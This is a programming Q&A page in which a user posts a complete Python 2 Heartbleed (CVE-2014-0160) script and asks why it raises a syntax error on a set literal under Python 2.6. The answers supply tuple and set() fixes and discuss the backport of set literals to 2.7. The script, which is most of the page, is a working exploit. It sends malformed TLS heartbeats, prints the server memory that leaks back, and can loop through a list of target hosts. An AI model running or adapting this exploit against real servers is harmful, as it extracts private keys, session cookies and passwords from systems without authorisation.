# Invalid syntax error in Python HeartBleed script

Tags: python

When I try to run the following heartbleed code, it throws a syntax error. I am new to python. I have tried to find the syntax error, but failed. I am using python 2.6.

```
#!/usr/bin/python

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect/loop (default: 1)')
options.add_option('-t', '--tls', type='int', default=1, help='Specify TLS version: 0 = 1.0, 1 = 1.1, 2 = 1.2 (default: 1)')
options.add_option('-s', '--starttls', action="store_true", dest="starttls", help='Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...')
options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port')
options.add_option('-v', '--verbose', action="store_true", dest="verbose", help='Enable verbose output')

opts, args = options.parse_args()

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')

# set TLS version
if opts.tls == 0:
    hb = h2bin('''18 03 01 00 03 01 40 00''')
elif opts.tls == 1:
    hb = h2bin('''18 03 02 00 03 01 40 00''')
elif opts.tls == 2:
    hb = h2bin('''18 03 03 00 03 01 40 00''')
else:
    hb = h2bin('''18 03 02 00 03 01 40 00''')


def hexdump(s):
    pdat = ''
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        #hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin)
    #print '  %04x: %-48s %s' % (b, hxdat, pdat)
    pdat = re.sub(r'([.]{50,})', '', pdat)
    return pdat

def recvall(s, length, timeout=5):
    try:
        endtime = time.time() + timeout
        rdata = ''
        remain = length
        while remain > 0:
            rtime = endtime - time.time() 
            if rtime < 0:
                return None
            r, w, e = select.select([s], [], [], 5)
            if s in r:
                data = s.recv(remain)
                # EOF?
                if not data:
                    return None
                rdata += data
                remain -= len(data)
        return rdata

    except:
       print "Error receiving data: ", sys.exc_info()[0]

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    if opts.verbose:
        print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s, targ):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return ''

        if typ == 24:
            if opts.verbose:
                print 'Received heartbeat response...'
            #hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return hexdump(pay)

        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return ''

def bleed(targ, port):
    try:
        res = ''
        print
        print '##################################################################'
        print 'Connecting to: ' + targ + ':' + str(port) + ' with TLSv1.' + str(opts.tls)
        for x in range(0, opts.num):
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sys.stdout.flush()
            s.settimeout(10)
            s.connect((targ, port))

            # send starttls command if specified as an option or if common smtp/pop3/imap ports are used
            if (opts.starttls) or (port in {25, 587, 110, 143, 21}):

                stls = False
                atls = False

                # check if smtp supports starttls/stls
                if port in {25, 587}:
                    print 'SMTP Port... Checking for STARTTLS Capability...'
                    check = s.recv(1024)
                    s.send("EHLO someone.org\n")
                    sys.stdout.flush()
                    check += s.recv(1024)
                    if opts.verbose:
                        print check

                    if "STARTTLS" in check:
                        opts.starttls = True
                        print "STARTTLS command found"
                    elif "STLS" in check:
                        opts.starttls = True
                        stls = True
                        print "STLS command found"
                    else:
                        print "STARTTLS command NOT found!"
                        print '##################################################################'
                        return

                # check if pop3/imap supports starttls/stls                            
                elif port in {110, 143}:
                    print 'POP3/IMAP4 Port... Checking for STARTTLS Capability...'
                    check = s.recv(1024)
                    if port == 110:
                        s.send("CAPA\n")
                    if port == 143:
                        s.send("CAPABILITY\n")
                    sys.stdout.flush()
                    check += s.recv(1024)
                    if opts.verbose:
                        print check

                    if "STARTTLS" in check:
                        opts.starttls = True
                        print "STARTTLS command found"
                    elif "STLS" in check:
                        opts.starttls = True
                        stls = True
                        print "STLS command found"
                    else:
                        print "STARTTLS command NOT found!"
                        print '##################################################################'
                        return

                # check if ftp supports auth tls/starttls                          
                elif port in {21}:
                    print 'FTP Port... Checking for AUTH TLS Capability...'
                    check = s.recv(1024)
                    s.send("FEAT\n")
                    sys.stdout.flush()
                    check += s.recv(1024)
                    if opts.verbose:
                        print check

                    if "STARTTLS" in check:
                        opts.starttls = True
                        print "STARTTLS command found"
                    elif "AUTH TLS" in check:
                        opts.starttls = True
                        atls = True
                        print "AUTH TLS command found"
                    else:
                        print "STARTTLS command NOT found!"
                        print '##################################################################'
                        return

                # send appropriate tls command if supported                        
                if opts.starttls:       
                    sys.stdout.flush()
                    if stls:
                        print 'Sending STLS Command...'
                        s.send("STLS\n")
                    elif atls:
                        print 'Sending AUTH TLS Command...'
                        s.send("AUTH TLS\n")
                    else:
                        print 'Sending STARTTLS Command...'
                        s.send("STARTTLS\n")
                    if opts.verbose:
                        print 'Waiting for reply...'
                    sys.stdout.flush()
                    recvall(s, 100000, 1)

            print
            print 'Sending Client Hello...'
            sys.stdout.flush()
            s.send(hello)
            if opts.verbose:
                print 'Waiting for Server Hello...'
            sys.stdout.flush()
            while True:
                typ, ver, pay = recvmsg(s)
                if typ == None:
                    print 'Server closed connection without sending Server Hello.'
                    print '##################################################################'
                    return
                # Look for server hello done message.
                if typ == 22 and ord(pay[0]) == 0x0E:
                    break

            print 'Sending heartbeat request...'
            sys.stdout.flush()
            s.send(hb)
            res += hit_hb(s, targ)
            s.close()

        print '##################################################################'
        print       
        return res

    except:
       print "Error connecting to host: ", sys.exc_info()[0]
       print '##################################################################'
       print               

def main():
    allresults = ''

    # if a file is specified, loop through file
    if opts.filein:
        fileIN = open(opts.filein, "r")

        for line in fileIN:
            targetinfo = line.strip().split(":")
            if len(targetinfo) > 1:
                allresults = bleed(targetinfo[0], int(targetinfo[1]))
            else:
                allresults = bleed(targetinfo[0], opts.port)

            if allresults:
                print '%s' % (allresults)

        fileIN.close()

    else:
        if len(args) < 1:
            options.print_help()
            return
        allresults = bleed(args[0], opts.port)
        if allresults:
            print '%s' % (allresults)

    print

if __name__ == '__main__':
    main()
```

The error is:

*root@bt:~/Desktop# python heartbleed.py File "heartbleed.py", line 238
    if (opts.starttls) or (port in {25, 587, 110, 143, 21}):
                                      ^
SyntaxError: invalid syntax*

Answer (score 0, accepted):

Please try

```
if (opts.starttls) or (port in (25, 587, 110, 143, 21)):
```

Convert it to tuple.

Answer (score 0):

```
{25, 587, 110, 143, 21}
```

is Python 3 syntax. It creates a set, and the direct Python 2.x equivalent code would be

```
set((25, 587, 110, 143, 21))
```

though any sequence type would do (e.g. Lafada's answer), but you might well find the rest of the code has bits that aren't backwards compatible with in Python 2.x

Edit: I'm wrong. As per @jpmc26's comment, it's Python 3 syntax but also backported to Python 2.7+

Comment: @TesselatingHeckler Okay, so does that mean it's better to upgrade to python 3? Lafada's bit fixed all those syntax errors, but there are new ones now!

_Error receiving data:  <class 'socket.error'>
Unexpected EOF receiving record payload - server closed connection
_

Comment: Yes - unless you have other scripts that need Python 2, then try and keep both interpreters, because those scripts might not run on Python 3. Edit: I don't know if that error is version related, or something else.

Comment: You're somewhat incorrect. The `{1,2,3}` literal syntax is was backported in 2.7. See https://docs.python.org/3/whatsnew/2.7.html#python-3-1-features. (And yes, I did test to be sure.)

Comment: @jpmc26 : that's weird. I definitely tested it and got an error, and then checked it in Python 3 and found it was type('set'). Now I retest and of course it works ... what on earth did I test before??? Thanks, I've edited my answer.